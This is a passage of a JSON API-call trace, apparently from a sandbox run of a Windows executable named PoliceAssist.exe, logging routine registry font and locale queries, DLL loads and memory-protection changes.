                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane4"
              }
            ],
            "repeated": 0,
            "id": 335
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane5"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane5"
              }
            ],
            "repeated": 0,
            "id": 336
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane6"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane6"
              }
            ],
            "repeated": 0,
            "id": 337
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane7"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane7"
              }
            ],
            "repeated": 0,
            "id": 338
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane8"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane8"
              }
            ],
            "repeated": 0,
            "id": 339
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane9"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane9"
              }
            ],
            "repeated": 0,
            "id": 340
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane10"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane10"
              }
            ],
            "repeated": 0,
            "id": 341
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane11"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane11"
              }
            ],
            "repeated": 0,
            "id": 342
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane12"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane12"
              }
            ],
            "repeated": 0,
            "id": 343
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane13"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane13"
              }
            ],
            "repeated": 0,
            "id": 344
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane14"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane14"
              }
            ],
            "repeated": 0,
            "id": 345
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane15"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane15"
              }
            ],
            "repeated": 0,
            "id": 346
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryValueExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "Plane16"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane16"
              }
            ],
            "repeated": 0,
            "id": 347
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              }
            ],
            "repeated": 0,
            "id": 348
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback"
              },
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback"
              }
            ],
            "repeated": 0,
            "id": 349
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryInfoKeyW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000254"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "SubKeyCount",
                "value": "4"
              },
              {
                "name": "MaxSubKeyLength",
                "value": "13"
              },
              {
                "name": "MaxClassLength",
                "value": "0"
              },
              {
                "name": "ValueCount",
                "value": "0"
              },
              {
                "name": "MaxValueNameLength",
                "value": "0"
              },
              {
                "name": "MaxValueLength",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 350
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "Name",
                "value": "MingLiU"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\MingLiU"
              }
            ],
            "repeated": 0,
            "id": 351
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "1"
              },
              {
                "name": "Name",
                "value": "MingLiU_HKSCS"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\MingLiU_HKSCS"
              }
            ],
            "repeated": 0,
            "id": 352
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "2"
              },
              {
                "name": "Name",
                "value": "PMingLiU"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\PMingLiU"
              }
            ],
            "repeated": 0,
            "id": 353
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "3"
              },
              {
                "name": "Name",
                "value": "SimSun"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\SimSun"
              }
            ],
            "repeated": 0,
            "id": 354
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000254"
              },
              {
                "name": "SubKey",
                "value": "Segoe UI"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Segoe UI"
              }
            ],
            "repeated": 0,
            "id": 355
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              }
            ],
            "repeated": 0,
            "id": 356
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "comctl32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffecf5a0000"
              }
            ],
            "repeated": 0,
            "id": 357
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x7ffecf5a0000",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "comctl32.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 358
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "RegisterClassNameW"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf625670"
              }
            ],
            "repeated": 0,
            "id": 359
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000084"
              },
              {
                "name": "ValueName",
                "value": "000603xx"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "kernel32.dll"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx"
              }
            ],
            "repeated": 0,
            "id": 360
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "kernel32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1660000"
              }
            ],
            "repeated": 0,
            "id": 361
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x7ffee1660000",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "kernel32.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 362
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "KERNEL32.DLL"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1660000"
              },
              {
                "name": "FunctionName",
                "value": "SortGetHandle"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee166a190"
              }
            ],
            "repeated": 0,
            "id": 363
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "KERNEL32.DLL"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee1660000"
              },
              {
                "name": "FunctionName",
                "value": "SortCloseHandle"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee1680170"
              }
            ],
            "repeated": 0,
            "id": 364
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000254"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "1",
                "pretty_value": "FILE_SHARE_READ"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000080",
                "pretty_value": "FILE_ATTRIBUTE_NORMAL"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 365
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000258"
              },
              {
                "name": "DesiredAccess",
                "value": "0x000f0005",
                "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x00000254"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Globalization\\Sorting\\SortDefault.nls"
              }
            ],
            "repeated": 0,
            "id": 366
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000258"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x06120000"
              },
              {
                "name": "SectionOffset",
                "value": "0x007fef00"
              },
              {
                "name": "ViewSize",
                "value": "0x00338000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 367
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000258"
              }
            ],
            "repeated": 0,
            "id": 368
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              }
            ],
            "repeated": 0,
            "id": 369
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000254"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids"
              }
            ],
            "repeated": 0,
            "id": 370
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "ru-RU"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru-RU"
              }
            ],
            "repeated": 0,
            "id": 371
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "ru"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "{0000004A-57EE-1E5C-00B4-D0000BB1E11E}"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru"
              }
            ],
            "repeated": 0,
            "id": 372
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "user32"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1f70000"
              }
            ],
            "repeated": 0,
            "id": 373
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x06460000"
              },
              {
                "name": "RegionSize",
                "value": "0x00100000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 374
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x06460000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 375
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffecf7ea000"
              },
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 376
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffecf7ea000"
              },
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 377
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "misc",
            "api": "SystemParametersInfoW",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "Action",
                "value": "0x00000042"
              },
              {
                "name": "uiParam",
                "value": "0x00000010"
              }
            ],
            "repeated": 0,
            "id": 378
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffecf7ea000"
              },
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 379
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffecf7ea000"
              },
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 380
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "SOFTWARE\\Microsoft\\CTF\\Compatibility\\PoliceAssist.exe"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\Compatibility\\PoliceAssist.exe"
              }
            ],
            "repeated": 0,
            "id": 381
          },
          {
            "timestamp": "2025-11-20 10:58:26,109",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "misc",
            "api": "GetKeyboardLayout",
            "status": true,
            "return": "0x04090409",
            "arguments": [
              {
                "name": "KeyboardLayout",
                "value": "0x00000409"
              },
              {
                "name": "LanguageName",
                "value": "English (United States)"
              }
            ],
            "repeated": 0,
            "id": 382
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
